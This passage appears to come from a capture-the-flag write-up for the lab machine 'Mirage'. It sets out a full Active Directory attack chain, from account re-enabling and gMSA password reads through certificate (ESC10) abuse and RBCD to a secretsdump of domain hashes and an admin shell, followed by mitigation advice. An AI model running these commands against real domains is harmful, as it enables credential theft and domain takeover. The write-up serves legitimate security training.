1
$Password = ConvertTo-SecureString "1day@atime" -AsPlainText -Force
1
2
$Cred = New-Object System.Management.Automation.PSCredential ("MIRAGE\mark.bbond", $Password)
Enable-ADAccount -Identity javier.mmarshall -Cred $Cred
1
2
$logonhours = Get-ADUser mark.bbond -Properties LogonHours | select-object -expand logonhours
[byte[]]$hours1 = $logonhours
1
Set-ADUser -Identity javier.mmarshall -Cred $Cred -Replace @{logonhours = $hours1}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> $Password = ConvertTo-SecureString "1day@atime" -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> $Cred = New-Object System.Management.Automation.PSCredential ("MIRAGE\mark.bbond", $Password)
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> Enable-ADAccount -Identity javier.mmarshall -Credential $Cred
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> $logonhours = Get-ADUser mark.bbond -Properties LogonHours | Select-Object -ExpandProperty LogonHours
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> [byte[]]$hours1 = $logonhours
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> Set-ADUser -Identity javier.mmarshall -Credential $Cred -Replace @{logonhours = $hours1}
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> Get-ADUser -Identity "JAVIER.MMARSHALL" -Properties Enabled
Get-ADUser -Identity "JAVIER.MMARSHALL" -Properties Enabled
DistinguishedName : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Enabled : True
GivenName : javier.mmarshall
Name : javier.mmarshall
ObjectClass : user
ObjectGUID : c52e731b-30c1-439c-a6b9-0c2f804e5f08
SamAccountName : javier.mmarshall
SID : S-1-5-21-2127163471-3824721834-2568365109-1108
Surname :
UserPrincipalName : javier.mmarshall@mirage.htb
DistinguishedName : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Enabled : True
GivenName : javier.mmarshall
Name : javier.mmarshall
ObjectClass : user
ObjectGUID : c52e731b-30c1-439c-a6b9-0c2f804e5f08
SamAccountName : javier.mmarshall
SID : S-1-5-21-2127163471-3824721834-2568365109-1108
Surname :
UserPrincipalName : javier.mmarshall@mirage.htb
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
Now this user has ReadGMSA permission on another user MIRAGE-SERVICES.
1
bloodyAD --kerberos --host dc01.mirage.htb -d mirage.htb -u javier.mmarshall -p 'Password123!' get object mirage-service$ --attr msDS-ManagedPassword
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ bloodyAD --host dc01.mirage.htb -k -d mirage.htb -u mark.bbond -p '1day@atime' set password javier.mmarshall 'Password123!'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ bloodyAD --kerberos --host dc01.mirage.htb -d mirage.htb -u javier.mmarshall -p 'Password123!' get object mirage-service$ --attr msDS-ManagedPassword
distinguishedName: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866
msDS-ManagedPassword.B64ENCODED: 43A01mr7V2LGukxowctrHCsLubtNUHxw2zYf7l0REqmep3mfMpizCXlvhv0n8SFG/WKSApJsujGp2+unu/xA6F2fLD4H5Oji/mVHYkkf+iwXjf6Z9TbzVkLGELgt/k2PI4rIz600cfYmFq99AN8ZJ9VZQEqRcmQoaRqi51nSfaNRuOVR79CGl/QQcOJv8eV11UgfjwPtx3lHp1cXHIy4UBQu9O0O5W0Qft82GuB3/M7dTM/YiOxkObGdzWweR2k/J+xvj8dsio9QfPb9QxOE18n/ssnlSxEI8BhE7fBliyLGN7x/pw7lqD/dJNzJqZEmBLLVRUbhprzmG29yNSSjog==
Mirage-Service$.ccache:305806d84f7c1be93a07aaf40f0c7866
If we look in BloodHound, there is no data showing any outbound object control or similar. However, if we check the writable properties of Mirage-Service, we find something interesting.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ impacket-getTGT mirage.htb/Mirage-Service$ -hashes :305806d84f7c1be93a07aaf40f0c7866 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Mirage-Service$.ccache
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ export KRB5CCNAME=Mirage-Service$.ccache
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ bloodyAD --host dc01.mirage.htb --dc-ip $IP -d mirage.htb -u Mirage-Service$ -k get writable --detail
distinguishedName: CN=TPM Devices,DC=mirage,DC=htb
msTPM-InformationObject: CREATE_CHILD
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=mirage,DC=htb
url: WRITE
wWWHomePage: WRITE
distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
manager: WRITE
mail: WRITE
msDS-HABSeniorityIndex: WRITE
msDS-PhoneticDisplayName: WRITE
msDS-PhoneticCompanyName: WRITE
msDS-PhoneticDepartment: WRITE
msDS-PhoneticLastName: WRITE
msDS-PhoneticFirstName: WRITE
msDS-SourceObjectDN: WRITE
msDS-AllowedToDelegateTo: WRITE
altSecurityIdentities: WRITE
servicePrincipalName: WRITE
userPrincipalName: WRITE
legacyExchangeDN: WRITE
otherMailbox: WRITE
showInAddressBook: WRITE
systemFlags: WRITE
division: WRITE
objectGUID: WRITE
name: WRITE
displayNamePrintable: WRITE
proxyAddresses: WRITE
company: WRITE
department: WRITE
co: WRITE
dn: WRITE
initials: WRITE
givenName: WRITE
description: WRITE
title: WRITE
ou: WRITE
o: WRITE
sn: WRITE
objectCategory: WRITE
cn: WRITE
objectClass: WRITE
distinguishedName: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msDS-HostServiceAccount: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
assistant: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
otherHomePhone: WRITE
streetAddress: WRITE
otherPager: WRITE
info: WRITE
otherTelephone: WRITE
userCertificate: WRITE
preferredDeliveryMethod: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
Here we can see that Mirage-Service has a lot of writable properties. One interesting writable is altSecurityIdentities, which can be used for S4U2Self delegation or impersonation tricks.
But the most important one is AllowedToActOnBehalfOfOtherIdentity — core to Resource-Based Constrained Delegation (RBCD) — which allows impersonation to a service.
DCS ESC 10
Now, using Certipy, update the altSecurityIdentities of mark.bbond to DC01$.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ certipy -debug account -u 'Mirage-Service$@mirage.htb' -hashes :305806d84f7c1be93a07aaf40f0c7866 -k -target dc01.mirage.htb -ns $IP -dns-tcp -timeout 10 -upn 'DC01$@mirage.htb' -user 'mark.bbond' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: MIRAGE.HTB
[+] Username retrieved from CCache: Mirage-Service$
[+] Nameserver: '10.129.119.87'
[+] DC IP: None
[+] DC Host: 'dc01.mirage.htb'
[+] Target IP: None
[+] Remote Name: 'dc01.mirage.htb'
[+] Domain: 'MIRAGE.HTB'
[+] Username: 'MIRAGE-SERVICE$'
[+] Trying to resolve 'dc01.mirage.htb' at '10.129.119.87'
[+] Resolved 'dc01.mirage.htb' from cache: 10.129.119.87
[+] Authenticating to LDAP server using Kerberos authentication
[+] Using LDAP channel binding for Kerberos authentication
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from Mirage-Service$.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: Mirage-Service$
[+] Getting TGS for 'HOST/dc01.mirage.htb'
[+] Got TGS for 'HOST/dc01.mirage.htb'
[+] LDAP Kerberos authentication successful
[+] Bound to ldaps://10.129.119.87:636 - ssl
[+] Default path: DC=mirage,DC=htb
[+] Configuration path: CN=Configuration,DC=mirage,DC=htb
[*] Updating user 'mark.bbond':
userPrincipalName : DC01$@mirage.htb
[*] Successfully updated 'mark.bbond'
After updating the UPN to DC01, we request the certificate. This certificate is used to enable an RBCD attack.
1
impacket-getTGT 'mirage.htb/mark.bbond:1day@atime'
1
export KRB5CCNAME=mark.bbond.ccache
1
certipy req -k -dc-ip $IP -target 'dc01.mirage.htb' -ca 'mirage-DC01-CA' -template 'User' -ns $IP -dns-tcp -timeout 10 -dc-host dc01.mirage.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ impacket-getTGT 'mirage.htb/mark.bbond:1day@atime'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in mark.bbond.ccache
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ export KRB5CCNAME=mark.bbond.ccache
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ certipy req -k -dc-ip $IP -target 'dc01.mirage.htb' -ca 'mirage-DC01-CA' -template 'User' -ns $IP -dns-tcp -timeout 10 -dc-host dc01.mirage.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN 'DC01$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'
Now we revert the UPN back to the original user.
1
unset KRB5CCNAME
1
certipy account -u 'Mirage-Service$@mirage.htb' -hashes :305806d84f7c1be93a07aaf40f0c7866 -k -target dc01.mirage.htb -ns $IP -dns-tcp -timeout 10 -upn 'mark.bbond@mirage.htb' -user 'mark.bbond' update
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ unset KRB5CCNAME
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ certipy account -u 'Mirage-Service$@mirage.htb' -hashes :305806d84f7c1be93a07aaf40f0c7866 -k -target dc01.mirage.htb -ns $IP -dns-tcp -timeout 10 -upn 'mark.bbond@mirage.htb' -user 'mark.bbond' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] KRB5CCNAME environment variable not set
[*] Updating user 'mark.bbond':
userPrincipalName : mark.bbond@mirage.htb
[*] Successfully updated 'mark.bbond'
Resource-Based Constrained Delegation
Now, using the certificate generated earlier, we take an LDAP shell to enable RBCD from the DC.
1
certipy auth -pfx dc01.pfx -domain mirage.htb -dc-ip $IP -ldap-shell
1
set_rbcd DC01$ nathan.aadam
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ certipy auth -pfx dc01.pfx -domain mirage.htb -dc-ip $IP -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'DC01$@mirage.htb'
[*] Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.129.119.87:636'
[*] Authenticated to '10.129.119.87' as: 'u:MIRAGE\\DC01$'
Type help for list of commands
# set_rbcd DC01$ nathan.aadam
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000
Found Grantee DN: CN=nathan.aadam,OU=Users,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1110
Delegation rights modified successfully!
nathan.aadam can now impersonate users on DC01$ via S4U2Proxy
# exit
Bye!
1
impacket-getST -spn 'CIFS/dc01.mirage.htb' -impersonate 'DC01$' 'MIRAGE.HTB/nathan.aadam:3edc#EDC3' -k
1
export KRB5CCNAME=DC01$@CIFS_dc01.mirage.htb@MIRAGE.HTB.ccache
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ impacket-getST -spn 'CIFS/dc01.mirage.htb' -impersonate 'DC01$' 'MIRAGE.HTB/nathan.aadam:3edc#EDC3' -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@CIFS_dc01.mirage.htb@MIRAGE.HTB.ccache
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ export KRB5CCNAME=DC01\$@CIFS_dc01.mirage.htb@MIRAGE.HTB.ccache
Hash Dumping
1
impacket-secretsdump -k -no-pass dc01.mirage.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ impacket-secretsdump -k -no-pass dc01.mirage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1adcc3d4a7f007ca8ab8a3a671a66127:::
mirage.htb\Dev_Account_A:1104:aad3b435b51404eeaad3b435b51404ee:3db621dd880ebe4d22351480176dba13:::
mirage.htb\Dev_Account_B:1105:aad3b435b51404eeaad3b435b51404ee:fd1a971892bfd046fc5dd9fb8a5db0b3:::
mirage.htb\david.jjackson:1107:aad3b435b51404eeaad3b435b51404ee:ce781520ff23cdfe2a6f7d274c6447f8:::
mirage.htb\javier.mmarshall:1108:aad3b435b51404eeaad3b435b51404ee:694fba7016ea1abd4f36d188b3983d84:::
mirage.htb\mark.bbond:1109:aad3b435b51404eeaad3b435b51404ee:8fe1f7f9e9148b3bdeb368f9ff7645eb:::
mirage.htb\nathan.aadam:1110:aad3b435b51404eeaad3b435b51404ee:1cdd3c6d19586fd3a8120b89571a04eb:::
mirage.htb\svc_mirage:2604:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:b5b26ce83b5ad77439042fbf9246c86c:::
Mirage-Service$:1112:aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866:::
[*] Kerberos keys grabbed
mirage.htb\Administrator:aes256-cts-hmac-sha1-96:09454bbc6da252ac958d0eaa211293070bce0a567c0e08da5406ad0bce4bdca7
mirage.htb\Administrator:aes128-cts-hmac-sha1-96:47aa953930634377bad3a00da2e36c07
mirage.htb\Administrator:des-cbc-md5:e02a73baa10b8619
krbtgt:aes256-cts-hmac-sha1-96:95f7af8ea1bae174de9666c99a9b9edeac0ca15e70c7246cab3f83047c059603
krbtgt:aes128-cts-hmac-sha1-96:6f790222a7ee5ba9d2776f6ee71d1bfb
krbtgt:des-cbc-md5:8cd65e54d343ba25
mirage.htb\Dev_Account_A:aes256-cts-hmac-sha1-96:e4a6658ff9ee0d2a097864d6e89218287691bf905680e0078a8e41498f33fd9a
mirage.htb\Dev_Account_A:aes128-cts-hmac-sha1-96:ceee67c4feca95b946e78d89cb8b4c15
mirage.htb\Dev_Account_A:des-cbc-md5:26dce5389b921a52
mirage.htb\Dev_Account_B:aes256-cts-hmac-sha1-96:5c320d4bef414f6a202523adfe2ef75526ff4fc6f943aaa0833a50d102f7a95d
mirage.htb\Dev_Account_B:aes128-cts-hmac-sha1-96:e05bdceb6b470755cd01fab2f526b6c0
mirage.htb\Dev_Account_B:des-cbc-md5:e5d07f57e926ecda
mirage.htb\david.jjackson:aes256-cts-hmac-sha1-96:3480514043b05841ecf08dfbf33d81d361e51a6d03ff0c3f6d51bfec7f09dbdb
mirage.htb\david.jjackson:aes128-cts-hmac-sha1-96:bd841caf9cd85366d254cd855e61cd5e
mirage.htb\david.jjackson:des-cbc-md5:76ef68d529459bbc
mirage.htb\javier.mmarshall:aes256-cts-hmac-sha1-96:20acfd56be43c1123b3428afa66bb504a9b32d87c3269277e6c917bf0e425502
mirage.htb\javier.mmarshall:aes128-cts-hmac-sha1-96:9d2fc7611e15be6fe16538ebb3b2ad6a
mirage.htb\javier.mmarshall:des-cbc-md5:6b3d51897fdc3237
mirage.htb\mark.bbond:aes256-cts-hmac-sha1-96:dc423caaf884bb869368859c59779a757ff38a88bdf4197a4a284b599531cd27
mirage.htb\mark.bbond:aes128-cts-hmac-sha1-96:78fcb9736fbafe245c7b52e72339165d
mirage.htb\mark.bbond:des-cbc-md5:d929fb462ae361a7
mirage.htb\nathan.aadam:aes256-cts-hmac-sha1-96:b536033ac796c7047bcfd47c94e315aea1576a97ff371e2be2e0250cce64375b
mirage.htb\nathan.aadam:aes128-cts-hmac-sha1-96:b1097eb42fd74827c6d8102a657e28ff
mirage.htb\nathan.aadam:des-cbc-md5:5137a74f40f483c7
mirage.htb\svc_mirage:aes256-cts-hmac-sha1-96:937efa5352253096b3b2e1d31a9f378f422d9e357a5d4b3af0d260ba1320ba5e
mirage.htb\svc_mirage:aes128-cts-hmac-sha1-96:8d382d597b707379a254c60b85574ab1
mirage.htb\svc_mirage:des-cbc-md5:2f13c12f9d5d6708
DC01$:aes256-cts-hmac-sha1-96:4a85665cd877c7b5179c508e5bc4bad63eafe514f7cedb0543930431ef1e422b
DC01$:aes128-cts-hmac-sha1-96:94aa2a6d9e156b7e8c03a9aad4af2cc1
DC01$:des-cbc-md5:cb19ce2c733b3ba8
Mirage-Service$:aes256-cts-hmac-sha1-96:80bada65a4f84fb9006013e332105db15ac6f07cb9987705e462d9491c0482ae
Mirage-Service$:aes128-cts-hmac-sha1-96:ff1d75e3a88082f3dffbb2b8e3ff17dd
Mirage-Service$:des-cbc-md5:c42ffd455b91f208
[*] Cleaning up...
Get the ticket from administrator and log in using admin.
1
impacket-getTGT 'mirage.htb/Administrator' -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3 -dc-ip $IP
1
export KRB5CCNAME=Administrator.ccache
1
evil-winrm -i dc01.mirage.htb -r MIRAGE.HTB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ impacket-getTGT 'mirage.htb/Administrator' -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Administrator.ccache
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ evil-winrm -i dc01.mirage.htb -r MIRAGE.HTB
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
e7dfae4892dfb4d9949f915a774631e7
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit
Mitigations & Security Recommendations
- Secure Network File System (NFS) Shares:
- Limit NFS export permissions. Do not export directories to
everyoneor anonymous users. - Enforce access control lists (ACLs) and require authentication for NFS mounts. Avoid storing files containing sensitive system architecture, network configurations, or operational reports in shared directories.
- Limit NFS export permissions. Do not export directories to
- Secure DNS Zone Configuration:
- Configure DNS zones to allow only secure, authenticated dynamic updates.
- Restrict dynamic update permissions to specific IP addresses or domain members to prevent arbitrary hosts from registering or hijacking existing DNS records (such as
nats-svc.mirage.htb).
- Enforce Protocol Encryption:
- Encrypt internal application traffic (such as NATS messaging connections) using TLS to protect authentication credentials and messages from interception via middleman attacks.
- Enforce authentication protocols that do not rely on transmitting credentials in plain-text.
- Restrict Active Directory Delegation Privileges:
- Audit and restrict permissions to write to the
msDS-AllowedToActOnBehalfOfOtherIdentityattribute. Domain users should not possess the rights to modify this attribute on Domain Controllers or critical computer objects. - Configure sensitive accounts to be “Sensitive and cannot be delegated” to prevent them from being impersonated via Resource-Based Constrained Delegation (RBCD).
- Audit and restrict permissions to write to the



